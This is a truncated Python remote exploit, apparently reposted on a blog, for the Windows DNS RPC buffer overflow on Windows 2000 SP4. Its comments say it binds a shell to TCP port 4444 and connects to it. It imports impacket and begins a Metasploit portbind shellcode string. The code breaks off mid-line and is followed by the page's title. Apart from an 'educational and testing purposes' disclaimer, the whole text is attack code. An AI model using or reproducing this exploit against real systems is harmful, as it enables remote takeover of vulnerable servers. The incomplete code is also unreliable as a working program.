- #!/usr/bin/python
- # Remote exploit for the 0day Windows DNS RPC service vulnerability as
- # described in [url]http://www.securityfocus.com/bid/23470/info.[/url] Tested on
- # Windows 2000 SP4. The exploit if successful binds a shell to TCP port 4444
- # and then connects to it.
- #
- # Cheers to metasploit for the first exploit.
- # Written for educational and testing purposes.
- # Author shall bear no responsibility for any damage caused by using this code
- # Winny Thomas :-)
- import os
- import sys
- import time
- from impacket.dcerpc import transport, dcerpc, epm
- from impacket import uuid
- #Portbind shellcode from metasploit; Binds port to TCP port 4444
- shellcode = "/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
- shellcode += "/x29/xc9/x83/xe9/xb0/xe8/xff/xff/xff/xff/xc0/x5e/x81/x76/x0e/xe9"
- shellcode += "/x4a/xb6/xa9/x83/xee/xfc/xe2/xf4/x15/x20/x5d/xe4/x01/xb3/x49/x56"
- shellcode +=
MS Windows DNS RPC Remote Buffer Overflow Exploit (win2k SP4)
最新推荐文章于 2020-01-19 17:01:02 发布